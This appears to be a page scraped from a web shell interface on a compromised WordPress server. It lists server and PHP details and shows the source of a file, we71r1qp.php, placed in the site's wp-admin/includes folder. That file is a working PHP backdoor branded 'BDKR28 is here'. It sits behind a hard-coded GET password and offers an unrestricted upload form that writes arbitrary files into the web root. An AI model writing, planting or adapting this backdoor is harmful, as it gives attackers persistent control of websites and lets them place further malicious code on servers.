HEX
Server: Apache
System: Linux WWW 6.1.0-40-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.153-1 (2025-09-20) x86_64
User: web11 (1011)
PHP: 8.2.29
Disabled: NONE
$ pwd: /var/www/media.kauko.lt/wp-admin/includes/
Upload Files
File: /var/www/media.kauko.lt/wp-admin/includes/we71r1qp.php
<?php
// Title: BDKR28 is here
?>
<!DOCTYPE html>
<html>
<head>
    <title>BDKR28 is here</title>
</head>
<body>
<?php
$password = isset($_GET['BDKR28']) ? $_GET['BDKR28'] : '';
$correct_password = '24uv'; // This will be replaced with a random password
if ($password !== $correct_password) {
    echo '<center><h2>BDKR28 is here</h2><b>Invalid Password!</b><br><br>';
    echo '<form action="" method="get">';
    echo '<input type="password" name="BDKR28" placeholder="Enter Password">';
    echo '<input type="submit" value="Submit">';
    echo '</form></center>';
    exit;
}
echo '<center><h2>BDKR28 is here</h2>';
echo '<form action="" method="post" enctype="multipart/form-data">';
echo '<input type="file" name="file"><br><br>';
echo '<input type="submit" name="upload" value="Upload File">';
echo '</form>';
if (isset($_POST['upload'])) {
    $file = $_FILES['file']['name'];
    $tmp = $_FILES['file']['tmp_name'];
    if (move_uploaded_file($tmp, $file)) {
        echo '<b>File Uploaded Successfully!</b><br>';
        echo 'File: <a href="' . $file . '">' . $file . '</a>';
    } else {
        echo '<b>File Upload Failed!</b>';
    }
}
echo '</center>';
?>
</body>
</html>
@ Telegram